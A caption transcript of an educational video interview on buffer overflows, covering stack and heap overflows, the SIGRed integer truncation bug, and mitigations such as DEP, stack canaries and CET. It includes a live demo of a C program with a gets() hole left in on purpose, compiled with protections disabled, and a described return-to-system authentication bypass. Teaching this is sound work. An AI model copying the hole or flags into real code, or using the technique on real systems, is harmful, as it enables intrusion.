Buffer Overflow Hacking Tutorial (Bypass Passwords)

Captions

The point is that it shows us roughly how many bytes we want to send in as an attacker to overrun that buffer. I love that, because in all the demonstrations I've seen, people are just stuffing it until they somehow get an overrun, right? Which is great. I mean, you can use the pattern tool, where you create a pattern and then you cause a process to crash, and then a piece of that pattern shows up in the register, and then you can ask the tool how many bytes into the pattern that piece was, and it shows you that's the buffer size, basically. But this is the more elegant way of doing it, I guess. So let's overwrite the return pointer with the address of system, and then a four-byte pad, and then finally the address of the shell. So why have a four-byte pad? Because I know someone's going to ask: we are returning to the system function. That is not how you call a function. You don't return to it, you call it. Look at that: access granted. So we successfully bypassed authentication. [Music] Now, one of the things I've learned in IT is that you can't stop learning. You've got to keep on improving your skills, keep on developing your skills, and Brilliant are a fantastic platform for that. It doesn't matter if you want to learn math, computer science, artificial intelligence, or programming; they have fantastic content on their website. You're not just going to be reading a book, as an example, or watching videos; it's very interactive and you are involved in your learning. I highly recommend Brilliant. Use the link below to get a 30-day trial and a 20% discount, so go to https://brilliant.org/DavidBombal. I really want to thank Brilliant for their fantastic partnership and for sponsoring my channel. They really, truly are brilliant.
Hey everyone, it's David Bombal, back with a very special guest, Stephen. Welcome, Stephen, it's great to have you back. For everyone who hasn't seen our previous video, have a look at the link below. Stephen's talking about zero-day millions and how you can earn millions by finding a zero day. It was a fascinating story, with lots of cool stories in that video, so have a look at it if you're interested in learning more about Stephen. But Stephen, just for people who haven't seen our previous video or don't know who you are, tell us a bit about yourself and tell us about your channel. Yeah, great. My name, as David mentioned, is Stephen Sims. I'm an instructor with the SANS Institute and also the curriculum lead there for the offensive operations curriculum. I'm also a courseware author of a few of their courses, on things like advanced pentesting and exploit development. I live out in the Bay Area in California and I've been doing bug hunting and exploit development for probably close to 20 years now. Time has flown, but it's a lot of fun. It's something where you never lose your interest, and you never will know everything. So tell us about your channel, because you started that not so long ago, right? Yeah, so I started it off like this: when I retire courseware content from a course through SANS, I'm like, well, this is content that I think people would still enjoy, even though we're moving it out. So I reached out to the community and said, hey, would you all like to see something like browser exploitation against Internet Explorer 11? And people said absolutely. So I started out that way and then continued down the advanced technical area, but it's branched out a bit. I just had one last Friday on hacking Google Cloud.
Yeah, so for everyone who's watching, we're going to cover, well, Stephen, tell us the topic that we're going to cover. I'll just say, go and look at Stephen's channel for amazing content. Stephen is one of the OGs in this field. If you really want to learn, go and have a look at his channel, go and subscribe, and go and show the love. But Stephen, what are we talking about today? Yeah, today we're just going to cover basic buffer overflows, and I think it's important to do that because even if you want to jump in at 2023 or 2024 and get into exploit development, you've got to understand the fundamentals, even if a lot of those types of attacks are mitigated in many cases. You were telling me offline that buffer overflows have been around forever. It's surprising that they're not dead now, but there's some news coming, right? Yeah, so I will always say that the golden years of exploitation were back in the 90s up into the mid 2000s, because there were no mitigations or security controls there preventing exploitation. These days, even if the vulnerability is still there, there are these mitigations that try to stop the actual exploitation from being successful, or even your shellcode execution. I remember people saying all the way back in the 90s that the day of buffer overflow exploitation is coming to an end any day now, and here we are in 2023 and it's still possible. But yes, as you mentioned, there are some newer mitigations called Control-flow Enforcement Technology, or CET, as well as shadow stacks and other mitigations, that I will say are the end of buffer overflows. The vulnerability is still there in the code, but the ability to actually exploit the vulnerability will pretty much be mitigated completely once these roll out. And if you're on the side of the fence where you don't want to see this stuff go away, it's still going to be some time, because the actual hardware, the processors themselves, have to support the mitigations, so 
they're not just going to flip, they being Microsoft or other vendors, are not just going to flip the switch and make it so they break all of your apps, so it's going to be a while. So you mentioned Microsoft. Is that something that's built into Windows, or do you have to do something to enable it? Yeah, so on Windows it's part of something called Exploit Guard, which used to be called the Enhanced Mitigation Experience Toolkit, or EMET. Exploit Guard came out on Windows 10 at some point and it's still there on Windows 11. It's, I would say, a mitigation toolkit where the majority of the mitigations, and there are over 20, are turned off by default, almost all of them, because Microsoft doesn't want to turn everything on and potentially break your application. So it's up to an administrator to understand the effect that the mitigations will have, both on application performance and on potentially breaking the app, depending on how it's coded. And is that available in Linux and macOS as well, or is it just a Microsoft thing? Yeah, most operating system vendors, all the big ones, have ways to turn this stuff on or off, but they're each different in their own way. And what's holding it back? Is it the hardware or the applications? Yep, well, for shadow stacks and stuff specifically, that's held back by the actual hardware, the processor architecture. That's great. So just for everyone who wants to learn, I mean Stephen, it's important to learn this. Like you said, it's a basic building block that you need to know, so even though this, I'd say, may stop soon, it's something that you need to learn, right? Yeah, and just because Microsoft might be implementing it doesn't mean that the IoT world and all these other things out there are supporting it. I mean, I want to keep quiet now and let you take us on this road, so perhaps you can just start with a gentle introduction and then go hardcore into it. What is a buffer overflow? 
Why is it important? And I know, you know, I just want to let you take us down this road. I know you said you've got some slides and stuff that you can share, so you take it away, Stephen. Yeah, great, thanks, and feel free to chime in and ask away. So yeah, I did put a few slides together. I want to show you two types of buffer overflows. The first one's going to be the most basic, ordinary one that you would see in a security class at any college you attend. The other one I will show you is going to be a more advanced one. It's just going to be a screenshot of some disassembly, and I'll show this one just because it's easy to digest. It's from the SIGRed vulnerability that came out a couple of years ago and affected DNS, and that type of overflow is a heap overflow. So they're both buffer overflows, but one's on the stack and one's on the heap, and the second one I'll show you will be more real world. Then I also plan on, we'll see how it goes, jumping over into the command line, and we can try to see this in a debugger. But a buffer overflow in its most basic form is when you're dealing with a function that is being called. If that function needs to, say, copy a string, meaning a number of characters, into a buffer and interact with it within the program, at that point you have to allocate the appropriate amount of space to store this information. So to take a step back, each function call that gets made gets its own stack frame. The stack is its own region of memory, and again, every function call gets a stack frame. Some functions will need a buffer and other ones don't. For the ones that need a buffer, you need to allocate memory on the stack, and it has a finite lifetime because it's only going to be there during the function call itself. Once the function returns, that stack frame gets torn down; it's no longer needed. So if that function needs a buffer, then you'll have a memory copy operation 
it could be one of many functions that actually copies the data from a source into the destination buffer, which in this case would be on the stack. So the problem comes in if there are no bounds checks, if we're not checking the size, the number of bytes that are going to be copied into the buffer. Then it is possible for an attacker, or just a regular user inadvertently, to send more data into the buffer than there is space available, which means that overflow of information has to go somewhere. So what is it overwriting? You know, there's this saying, I think Einstein said it: you really know when someone knows this stuff when they can explain it simply, and you just did that. I mean, I've been doing a lot of research on this and you just explain it so nicely. So on this slide is a very basic C program that has a buffer overflow vulnerability intentionally written into it. On the left side, where it says code, that would be the code segment. This is where the executable code is stored in memory while the program is running, while the process is up and running. And then over on the bottom right it says stack. That would be a different location in memory that is specifically there to store stack frames associated with the various function calls. In the code on the left you see that we're creating a buffer. We're calling it buffer, it's a character buffer, and we're setting it to 16 bytes, so 16 total bytes of memory have been allocated on the stack frame associated with this function called overflow. If we continue forward, we then have a function called strcpy, which is a banned function, and by that I mean it's antiquated, it's unsafe, and it should never be used anymore. But it's still out there in legacy code you will come across, so it still has to be supported. You see where it says strcpy buffer, so that is the destination first, which is that 16-byte buffer that'll be allocated over on the right, and then it says input 1 is the source, so input 1 is 
going to be coming in from what we would call argument vector one. You might have heard of argv and argc; that's the argument vector and counter. argv[0] is always the program name, argv[1] would be the first argument that you pass in via the command line, and then if you have another argument, that would be argv[2]. Think about an example like ping. If you say ping space 127.0.0.1, ping is the program name, so that would be argv[0], and then your IP address, the loopback in that case, 127.0.0.1, is the address that we're pinging, and that would be argument 1. So in this case, whatever the user types in as a command line argument is being taken and written via strcpy into that buffer that we allocated with 16 bytes. If you look at the very bottom, you can see we run this program called vuln program and we're using Python to just send in 12 A's, and you can see that those 12 A's are being written to memory into that buffer. It's being written from the top downward, and that's what that arrow pointing down means. We've only written 12 bytes in this case, so we're not hurting anything, and you wouldn't realize that there's a vulnerability yet in this program because the process is not going to crash. If we do this again, now you can see on the bottom we do a times 32, so we're writing 32 A's into a 16-byte buffer. You can see over on the right we've overwritten everything else that was there, notably the return pointer. The return pointer is how the function that we've called, in this case the overflow function, knows where to return control after it's done doing what it's supposed to do. We do that by returning to the return pointer. There is a special instruction called call. So if we're running this program in the main function, we've just started up the program, and you hit this instruction that says call overflow, the call instruction takes the very next address where execution would have continued and pushes it onto the stack so that once the function we've 
called finishes, it knows where to return control. In this case we've overwritten it with these A's, so the process would crash and we get this segmentation fault, where the instruction pointer, or program counter as it's also called, would show us 41414141, because capital A in ASCII hex is 41. Is there a reason why we choose A, or is it just an arbitrary choice? That's a good question, and there are multiple takes on that. One is that, hey, it's just the first letter of the alphabet, so why not. Another big part of it is that if you see your 41414141 showing up anywhere in the process, in registers or memory, you know that that's your data that you sent in, so it's kind of like a little signature. But the other reason is that 41414141 is typically in a virtual memory address range that is not mapped into the process, so if you ever try to read from that address, write to that address, or execute what's at that address, there's a good chance it's not mapped and it will just cause an instant crash. In all the examples I've seen it's A, so it's great to get a real explanation of that rather than people just doing it for whatever arbitrary reason, so thanks. 
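The slide itself is not reproduced in the captions, so here is a minimal C sketch of the pattern being described, assuming a 16-byte buffer filled by strcpy. The function name overflow comes from the talk; would_overflow and filler_as_address are hypothetical helpers added only to illustrate the 12-versus-32 A's comparison and why the crash address reads 41414141.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 16 /* the 16-byte buffer described on the slide */

/* The vulnerable pattern: strcpy takes no size argument, so input longer
 * than 15 characters plus the terminating NUL writes past the buffer.
 * Only call this with short input. */
void overflow(const char *input)
{
    char buffer[BUF_SIZE];
    strcpy(buffer, input); /* no bounds check */
    printf("copied: %s\n", buffer);
}

/* Hypothetical helper: 1 if input (plus its NUL) would not fit, else 0. */
int would_overflow(const char *input)
{
    return strlen(input) + 1 > BUF_SIZE;
}

/* Hypothetical helper: the 32-bit value formed by four copies of one
 * filler byte, which is what ends up in a 4-byte saved return address. */
unsigned long filler_as_address(unsigned char filler)
{
    unsigned long b = filler;
    return (b << 24) | (b << 16) | (b << 8) | b;
}
```

With the 12 A's from the first run, would_overflow returns 0; with 32 A's it returns 1, and filler_as_address('A') is 0x41414141, the value that shows up in the instruction pointer.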
No worries. So that's it in its basic form. Again, if we start over real quick and just summarize: we start this program called vuln program. It wants an argument, so we just send it some A's. The main function is the very first function to execute once the process is created. You can see here that the main function calls a function called overflow. The overflow function allocates a 16-byte buffer on the stack, then strcpy copies whatever command line argument you sent in into that destination buffer on the stack. Since strcpy does not include a size argument limiting the number of bytes that are permitted to be written to the destination, we can send in as many as we want, and when we overrun that buffer we're overwriting, in this case, something called the return pointer, which should be how this function knows where to send the instruction pointer once it's done so that execution continues like it should. But we've overwritten it with AAAA, causing it to crash. What the attacker wants to do next: we would attach to the process with a debugger and start understanding it. If a mitigation such as address space layout randomization is not on, which it typically is, then we can statically set what we overwrite the return pointer with. So you see on the image here where it says return pointer. Previously we had AAAA, which caused it to crash because we tried to execute whatever's at memory address 0x41414141. In this case we want to overwrite that return pointer with an address in virtual memory where we can send our data. So that buffer that was allocated: if we can get the address of that, then we can put our shellcode there, which is the payload we want to have executed. Maybe you've heard of Meterpreter, or just command exec shellcode, or add-a-user; there are all different types of shellcode. The two big parts are: you've got your vulnerability, which you exploit to get control of the process, then you've got the shellcode, which serves as your payload, which is what you want to execute once 
you do get control. So what we want to do is put our shellcode into that buffer and overwrite the return pointer with the address of where that shellcode is in the buffer. Then when the function goes to return, we get our payload execution. That's the goal. So that would be a very basic stack overflow, and as time has gone on, lots of different mitigations have been put into place to try to make it so you can't exploit this simple vulnerability. So it's not treating the root cause, it's treating the symptoms. The root cause is the bad coding; the symptoms are these types of things that we're able to do. An example of a mitigation would be data execution prevention. This one came out way back in XP Service Pack 2, if we're talking about Windows, but it wasn't turned on by default for all processes because Microsoft didn't want to break your programs. What that would do in this case, if we overwrite the return pointer with the address of our shellcode on the stack, is break the exploit, because the permission that we need, which is execute, is turned off with DEP, data execution prevention, being on. So that's a pretty effective control. There are ways to get around it. It's like a cat and mouse game where every time a new mitigation comes out, we try to figure out how to get around it or avoid it or disable it. Stephen, I always see examples where people are using C, and you're using C here again. Is there a reason why C is used rather than, say, Python? 
Yeah, great question. So these are low-level languages. You've got assembly, you've got C++; these are examples of low-level languages. Objective-C is another one. And these low-level languages are extremely powerful because you have direct access to processor registers, direct access to memory, and the power to allocate and deallocate memory and move memory around, those low-level operations. You've heard that term, with power comes responsibility, right? With great power, great responsibility, something similar to that. You have to be very careful if you're writing in a language like C, because there's no protection, no management of the memory that's being allocated and deallocated to protect you, as there is in a higher-level language like C#. So that's kind of the reason behind it. And you might say, well, why would people use these low-level languages if they're dangerous? Because of the speed and power that you have. You might compile something and the compiler compiles it in a way that you don't like, maybe it's inefficient or it's not allowing you to do something that you want to be able to do. So in C you can just create some inline assembly right there in your program and make it do what you want it to do. You can literally say move this data from this register into this other register and pop this off the stack. It's very powerful. The higher-level languages manage memory for you and have other controls and protections that make those primitive or old-school types of attacks impossible, or virtually impossible. I've heard a lot of people say you should use Rust rather than C when coding in production. 
Yeah, absolutely. Microsoft, I'm sure you've been watching: just recently, a couple of months back, I think it was Mark Russinovich or someone said, hey, if you're interested, check out the latest update, I think it was a preview version of Windows 10 or 11, where win32k.sys has some components that are running in Rust now. Historically you would see win32k.sys, which is probably C++; it's a driver. But then win32k.rs.sys, I think it was, that's the Rust version, or at least part of it has been rewritten in Rust. The interesting thing about Rust is you get a lot of the speed and power that you need, but with the memory safety that you benefit from with the higher-level languages. There's a lot to it, though. There are millions of lines of code in, let's say, the Windows operating system, so you can't just swap all that stuff out overnight. Another issue you run into is limitations with the language, because the language hasn't been around as long and it's not as mature, so something that works fine in C++ may not be possible in Rust, and they've got to work with the language developers to actually implement support. But if I was writing an application, based on your experience with exploit development and all of this, would you recommend developers today write in Rust when they can, rather than C? Yeah, absolutely, yeah. Because I mean, it's so nice to see this example. You hear these messages saying learn Rust or program in Rust, but this is a really nice visual example of why you'd rather use Rust, or Python, let's say, than C, and it's great that you've given us advantages and disadvantages of each. So sorry for taking us on this tangent, but that's great information, thanks. 
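To make the memory-safety point concrete: the bounds check that a memory-safe language performs for you can be written by hand in C, and the vulnerability is simply the case where nobody wrote it. The following is a minimal sketch only; copy_bounded is a hypothetical helper, not something shown in the video.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: copies src into dst only if it fits, including the
 * terminating NUL. Returns 0 on success, -1 if the input is too long. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t needed = strlen(src) + 1;
    if (needed > dst_size) {
        return -1; /* refuse instead of writing past the buffer */
    }
    memcpy(dst, src, needed);
    return 0;
}
```

Called with a 16-byte destination, copy_bounded accepts "password" and rejects a 32-character string without touching the buffer. In C that check is the programmer's job on every copy, which is the trade-off being discussed.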
I always say in a classroom, and you've heard this millions of times, if you have a question, there's a good chance 10 other people have that same question; you've got to be the one that raises a hand. But yeah, so many of the browsers and big applications, like Adobe Acrobat Reader and whatever editor, and then you've got email clients and the operating systems themselves, most of them are in C++, and it's because of that power and that speed that you get with that language. And now you're having to go and train a lot of legacy developers who have so much history and experience with C++, and they've got to learn a new language, and that's going to come with a set of challenges. I want to jump over to the command line in a little bit here and see if we can get ourselves into some trouble, so we'll see what we're able to make happen. But I want to show you one more example of a different type of overflow that I mentioned earlier, which would be a heap overflow. The heap is actually a different region of memory than the stack. When I say different regions, like the code segment, the stack segment, the heap segment, what that really means is you're carving out a different section in virtual memory that's specifically been reserved and allocated to support one specific thing. So the code segment is specifically there to hold the executable code associated with the process. In that case you can mark that region of memory with the execute permission on, because it has to be on, but you don't want it to be writable, so you turn the write permission off. And then there are all the other segments, like the stack. To simplify what the stack is: the stack segment is a specific region of memory that is used for function calls. Every function call gets its own stack frame, which just means a small allocation reserved specifically for that function. It goes through something called a prologue at the 
beginning of the function that sets up the stack frame, and then at the end of the function you go through an epilogue that tears down the stack frame. That is all compiler-inserted code; you as a programmer don't need to care. That stack memory, again, is for finite operations, for function calls: you get in, you get out. Now when you talk about the heap, that's a more dynamic area of memory. Let me give you a good example so it'll help you understand. Let's say that you're using Chrome and you're navigating the web and you go to a website that's actually a PDF document, so you're now in your browser window viewing a 10-megabyte PDF document. The stack is not a good area of memory for that, because the stack is really closely tied to the code segment, where again, as the process is running and functions are called, each function that gets called gets its own little stack frame, and that's just constantly going on in the background. The heap, by contrast, would be a good place to store the memory associated with that PDF document we're looking at, because its lifetime is not finite. The developer of a browser has no idea how long you're going to keep that window open. We need to let that memory stay in use and resident until the user goes to the URL bar and changes it to the Google home page. Then we free all of that memory that was being used by the PDF document so it can be recycled and reused by the process. 
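The stack-versus-heap lifetime difference can be sketched in a few lines of C. This is only an illustration; stack_scratch_length and load_document are hypothetical names, and the "document" is just a string standing in for the PDF in the example.

```c
#include <stdlib.h>
#include <string.h>

/* Stack: scratch lives only for the duration of this call and is gone
 * when the function returns and its stack frame is torn down. */
size_t stack_scratch_length(const char *text)
{
    char scratch[64];
    strncpy(scratch, text, sizeof scratch - 1);
    scratch[sizeof scratch - 1] = '\0'; /* strncpy may not terminate */
    return strlen(scratch);
}

/* Heap: the allocation outlives this call. The caller decides how long it
 * stays resident and must free() it when the document is closed. */
char *load_document(const char *text)
{
    size_t n = strlen(text) + 1;
    char *doc = malloc(n);
    if (doc != NULL) {
        memcpy(doc, text, n);
    }
    return doc;
}
```

A caller would keep the pointer returned by load_document for as long as the window stays open and call free on it when the user navigates away, which is the "recycled and reused" step described above.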
If I understand right, these can also be very big files, hence the example of a 10 meg PDF, or it could be 100 meg or something, right? Yeah, so the heap and the stack are both considered dynamic regions of memory that are able to grow, and therefore they don't play nicely together. You've got to keep them apart because you don't want them colliding into each other. So you'll typically see it where the stack and the heap are multiple gigabytes away from each other and growing towards each other, and they should never collide, or you'll see them growing away from each other; that's how Windows does it. So again, the heap is for dynamically allocated memory that doesn't have a finite lifetime. The interesting thing about that, though, and this is another area where we're not going to go down the rabbit hole, is that vulnerabilities like type confusion and use after free are heap-related vulnerabilities. If you're familiar with programming, you know what a function does. We call a function, like maybe we create a calculator function that wants two arguments: give it two numbers and it will multiply them together and return the product back to you. Again, the function is just taking those numbers, multiplying them, displaying the result, and returning. That function call doesn't store or preserve anything that you just did. It's just a little template that you can call over and over again to do a very specific thing: you get in, you get out. Heap memory is different. Once it's allocated, maybe we want to create an object. You've heard of object-oriented programming, I'm sure. So let's say you want to instantiate an instance of something called the dog class. With this dog class, to use a silly analogy, you can choose the breed of the dog and various attributes such as the fur color, the size of the dog, the eye color of the dog. Those are all the attributes you can select, and then you've got the methods or functions like sit, roll over, lay down, 
speak. When you instantiate an instance of this dog, you can then reference that dog, the object, and say dog dot speak or dog dot sit, and that instance of that object will do the things you're telling it to do. You can instantiate as many instances as you want, and this all lives out on the heap. It gets very complex, because something has to manage that memory and manage those objects. Take this vulnerability class called use after free, for example: if we're somehow able to trick the process into thinking that an object is no longer needed, and it destroys it and gives the memory back to the heap, what if the process still needs it? It goes to access that object that's supposed to be there and, oof, it crashes. So it gets very complex out there on the heap. But here's the example I'm going to show you. What we're looking at here, and I know it looks like a lot of junk, is a disassembled program, a small piece of a function of a disassembled executable. Specifically, it's dns.exe from Windows. What we're looking at is where the SIGRed vulnerability resides, if you heard of that vulnerability from a number of years ago. It was a very critical vulnerability because it affected DNS, which is a publicly accessible service, so obviously from an attacker's perspective that's very interesting. The researchers that discovered this vulnerability were from Check Point. On the left we've got a snippet of one function and on the right we've got a snippet of another function. The snippet on the right is called by the snippet on the left. I'm using my mouse cursor, I know it's small, but see where it says call RR_AllocateEx: the little snippet on the right is RR_AllocateEx disassembled. So what does disassembled mean? When we've compiled a program, the kind that you double-click on to get it to run, that's all in machine code. So it's basically hexadecimal, and that hexadecimal that you're looking at is opcodes and operands, so that's, you know, 
what the processor uses. Obviously for us that's not easy to read, a bunch of opcodes like 90 eb06 34 41, I mean, that's pretty crazy. So what a disassembler does is take those opcodes and disassemble them into their mnemonic representation, which is what you have here on the screen, called disassembly. It's still not easy to read; this is very low level. What we're looking at would be an example of 64-bit x86 disassembled code. I put in some notes; the little bits of blue on the right are comments that I added. But I'm just going to really quickly show you what the issue here was. You can see down at the very bottom, call memcpy. memcpy is a function that has a size argument, so you would think that if it's got a size argument, we can specify the maximum number of bytes that are permitted to be written to the destination, preventing a buffer overflow. strcpy didn't have that option; there was no size argument. memcpy does, so how can there be a vulnerability? Let's talk about this, because this is where it gets complex. What gets complex is the calculation of that size argument, because oftentimes we can't statically specify what the size is, so it has to be calculated from something else, and that something else, unfortunately, is oftentimes user-influenceable. That's a word: we can influence that calculation. Now, being able to influence that calculation can be quite complex, and that's where the research comes in. What's going on here is there was a special DNS query type that allowed you to do interesting things. Normally DNS runs over UDP port 53, but DNS can also run over TCP port 53, which allows us to increase the size, and you have, you know, ACK and SYN-ACK and stuff like that, so it adds some options. And this specific type of DNS query, through compression and other factors, allows you to massage or groom how much data ends up needing to be 
copied to a destination. So this call to RR_AllocateEx: if you look towards the bottom on the right, it says call Mem_Alloc. That's the actual function that allocates the memory on the heap to store the data associated with this DNS query coming in across a socket. The issue that happens here, and maybe you can add a little pointer here after the fact, is where it says movzx dx into edi and movzx cx into esi. dx and cx are two-byte processor registers. Two bytes, so 2 to the 16th power, a maximum value of 65,535. Only the lower two bytes of the processor register are being taken into consideration for the memory allocation. In other words, the maximum memory allocation can be 65,535; that's the max because of this vulnerability in the code. It should not be limited to only 2 bytes, but it is, and we get into trouble because there's something called an integer overflow. If you've ever looked at an odometer and the odometer says 999999999, when you add 1 to that, what happens? It rolls over back to zero. Or does it really? Those digits roll over to zero, but it carries the 1 to the left, right? That ends up becoming the issue. If we can cause an integer overflow, rolling over 2 to the 16th power back to zero again, the memory allocation that gets made, because it's only looking at the lower two bytes, ends up being really tiny. Meanwhile, if we go back to the caller, memcpy is what actually needs to copy the data to that destination buffer that's been allocated. memcpy takes in an unsigned 32-bit integer, so four bytes are taken into consideration, not just two. So you see where I'm going. What's going to happen there is memcpy will happily copy in way more than 2 to the 16th power bytes to a destination buffer that was never capable of holding that much data. So it results in a heap overflow, and that's where we got into trouble here. 
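The size mismatch described here can be modelled in a few lines of C. This is a simplified sketch of the explanation above, not the actual dns.exe logic; alloc_size_seen and bytes_past_allocation are hypothetical names, and the cast to uint16_t stands in for reading only the low two bytes of the register.

```c
#include <stdint.h>

/* Hypothetical model: the size the allocator sees when only the low
 * 16 bits of the requested length are kept. */
uint16_t alloc_size_seen(uint32_t requested)
{
    return (uint16_t)requested; /* wraps modulo 65,536 */
}

/* Hypothetical model: how many bytes land past the end of the allocation
 * if the copy then uses the full 32-bit length. */
uint32_t bytes_past_allocation(uint32_t requested)
{
    uint32_t allocated = alloc_size_seen(requested);
    return requested > allocated ? requested - allocated : 0;
}
```

In this model a length of 65,535 still allocates 65,535 bytes, but 65,536 rolls over to 0 and 65,540 to 4, so a copy of 65,540 bytes would write 65,536 bytes past a 4-byte allocation. That gap between the allocated size and the copied size is the heap overflow.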
And that occurred on the server, right? So the client was able to get an overflow on the server? Yep, it was a server-side vulnerability. So as you can see just from that explanation, and I tried to simplify it as much as possible, but just based on that information you can see how complex it is. Now, I love how you're explaining this, Stephen. I mean, I can see, number one, that you train a lot of people, and number two, you really understand this, because you're explaining it simply even though it's complex. I appreciate you doing that. Yeah, for sure, it's a lot of fun. I mean, a lot of these vulnerabilities end up getting mitigated, they get patched of course, but the folks at Microsoft, like Matt Miller, who is the guy who wrote the original Meterpreter module and has worked at Microsoft now for a long time, he's one of the guys responsible for implementing and creating these mitigations that make those types of exploit techniques not possible. What I want to do now, if we have time to do so, is jump over to the command line and just take a look at what this would look like in the code. It might not let us do it, but we'll give it a shot. All right, so we're at the command line right now. I'm on just an Ubuntu virtual machine, and what I want to do is try to create a little program and intentionally cause it to have a buffer overflow vulnerability. Let's go with vuln, that sounds good, that's it, and then we use vim, and now we're going to go ahead and start coding it up. I'm probably going to add more than I need, but I don't want to have to deal with many compiler errors, so we'll just add in the appropriate support that we need. So stdio, and then I'll include a couple more; I don't know if I'm going to need them or not, but better to put them in than not. stdlib, close that out. So these are the headers that I need for this, and then I'm going to create a static password in here. You would never do this in the real world, but define a password, and we'll call it
password, because that's a great password of course. And then I'm going to start the main function, so int main, int, and here's what I'm going to do: argc, that's the argument counter, and I talked about this a bit earlier, and then we'll also do argv. If you remember, argc is the counter, argv is the vector, and argv[0] is always the program name, so that's what we'll start with there. So let's jump into the main function here. In the main function, I don't know what my ID is currently, let me see if I can check that real quick. So my ID is 1000, I should have guessed that. All right, so I'm going to say setuid, because what happens a lot of times is a process will drop your privileges, so I'm going to set it back. I probably don't need this; normally this would be the case if I want to make sure it runs as root, but I'm not going to mess with that right now. So we've got the setuid, if that works for us. If, and then I'll say argc. I'm only putting this in to help you understand, if you're not very familiar with C, the argument vector, because I'm sure you've seen, when you run a program, if it wants command-line arguments it yells at you and says, hey, I want command-line arguments, or maybe it doesn't like command-line arguments. So this program, I'm going to make it so it doesn't want command-line arguments, actually, so we'll skip the argument vector part, but I'll still put it in here. So char, and what I'm going to do here is say if the, actually that's not what I want, if the argument vector is greater than one. So I don't want any arguments in this program, so if the argument counter is greater than one, then I'm just going to give it a usage statement: printf "there is no usage", let's put that in there. And the reason, again, I'm putting that in there is because it should help you see how the argument vector and counter work. Again, argv[0] is the program name, and argv[1] would be the argument that you sent in, the very first one. I don't want any, so if somebody tries to send an
argument, I'm going to yell at them and say, hey, there's no usage. Not terribly exciting. I mean, keeping it simple, which is great. Yeah, so all right, we've got that knocked out, and then we can say, if that happens, we'll exit with a one, meaning an error, and it will close out. So that's a little check to see if you sent in an argument. And now I'm just going to call the vulnerable function, or the function with the vulnerability that I haven't created yet. I'm going to call it check password, checkpw, and it doesn't want any arguments. Return zero if we don't have any issues, and then close out. Next we've got to create the function with the vulnerability, so I'm going to create a function called checkpw, and then when we go into this function it's going to say printf "please enter the password", and then, yes, this is the vulnerability: I'm using the gets function. You should never use that function, because it doesn't have a size argument. So I'm saying gets(pw), and then inside of here we're going to say if string compare says the password is "password", then call the granted function, and we haven't created that function yet. Else we're going to say printf "access denied". I'll close that out. Let me just think here real quick. I'm gonna return zero and then close this function. One more function, called granted, and this function will simply say, if you reach it, printf "access granted", and then return zero. Close that out, and that should be our whole program. So if we walk through that again: we've got the main function, which is the first thing that'll execute. It tries to set the uid back to 1000, which should be fine, and then it says if the argument counter is greater than one, meaning if someone entered in any argument, print out a message that says there's no usage and exit out with an error of one; zero would be no error, one is an error, as a status code. If there are no arguments, call the checkpw function. The checkpw function says please enter a password, then gets(pw), so it's going to prompt
us for standard input to enter in a password. It comes in, and it says go ahead and compare the password, which is basically just the string "password", against what we sent in. If it's zero, meaning they were equal, if they matched, then call the access granted function, which will print out access granted; otherwise print access denied and return out. It's a pretty simple little program, but it's got a buffer overflow, because this guy here doesn't have a size argument, and I've only allocated a very small buffer. Have I even done that yet? Let me see here. Nope, I forgot to do that. Glad I went through that and actually read through that, because it wouldn't have worked. I love it when people like yourself make mistakes, it's encouraging for the rest of us. Especially in very basic things like this. char pw, we're gonna make it a 100-byte buffer. All right, that should be good. All right, so there's a little program, let's see if we can get it to compile now. That's going to be the question; it might block us, but we'll try. All right, I'm gonna make it just a 32-bit executable right now to keep things simple: gcc -m32. -m32 means compile it as a 32-bit binary, but I'm gonna kill some mitigations that would otherwise be automatically added in, so I'm going to say -z execstack, which turns off DEP, and then also -fno-stack-protector, I think that's what it needs to be, which says turn off stack canaries. And then the program name is vuln.c, and we'll just call it vuln. It's going to yell at us. It says, did you mean -fno-stack, oh, I put in one extra hyphen. All right, did it compile? So it's yelling at us; it says there at the bottom the gets function is bad, don't use it. Well, we'll just ignore that. Let's see if it actually compiled, and it did, so it works as expected. Now, we know there's a vulnerability. So to show you that argument vector thing, if I try to enter an argument, it's saying there's no usage, because I entered that in, and if
you look at the disassembly, it's really easy to spot that, and you know exactly where you are in the code, because it's doing a little check. Now, we know this is a 100-byte buffer, so here's something cool I want to show you, which is how you can determine the buffer size through reverse engineering, as opposed to just cramming in a bunch of data with a pattern or something like that. So what we could do is go to GDB. GDB is the GNU debugger, and it's a debugger that supports Fortran, C and C++, written by Richard Stallman many, many decades ago. It's a command-line debugger that's not very friendly or intuitive, but there are things to help: you can get a front end to it, like a graphical front end with DDD or EDD, but we're using an extension called GEF, you can see it down at the bottom. That's an exploit development assistant tool that has a bunch of functionality that comes along with it; it imports that into the debugger so we can take advantage of it. So I'm just going to say disassemble main. I'm now defaulting to something called the Intel disassembly syntax. GDB by default uses what's called AT&T syntax; basically it swaps the operand position and does some other things, but it doesn't really affect the behavior of the program, it's just how you, as the person reversing, would like to see the disassembly displayed, nothing more than that. So by looking in this disassembly, some things stick out, like right there, exit. Well, we know what the exit function does, and we even put that in there, we said return zero and exit. puts, that's the put string function that just prints to the screen. So some things stick out pretty quickly as you're looking in here. There's that setuid; remember, we tried to set the uid to 1000, so this 0x3e8 is very likely 1000 in hexadecimal being pushed onto the stack as an argument to the setuid function. Now this function checkpw, we know that that's the one that's got the vulnerability in it, because that's where I put the gets function call. So if we say disassemble checkpw, when
we scroll up here, there's that call to gets. Right above it, gets needs the destination address where it's supposed to write the data that we type in. It needs to know where to write it, so we have to give that to the gets function as an argument, and this is how we're going to determine the buffer size. So this right here, it says ebp-0x6c, that ends up being our buffer size, because ebp is the extended base pointer, that's a stack register, and basically what it's saying there is take the address of the base pointer, which points to the base of the stack frame, minus the buffer size, and that's how it tells the gets function where to write the data. But for us, it tells us the buffer size. So we could real quickly say something like shell python -c, and then I'll just say print, and then what was that size again? That was 6c, right? So print 0x6c, and let me close that out, and it says 108. So if you remember, the buffer size that we created was a hundred bytes, right? So there are other things that might be playing a role here, making it a little bit bigger, but the point is that it shows us about how many bytes we want to send in as an attacker to overrun that buffer. I just want to interrupt you and say I love that, because in all the demonstrations I've seen, people are just stuffing it until they somehow get an overrun, right?
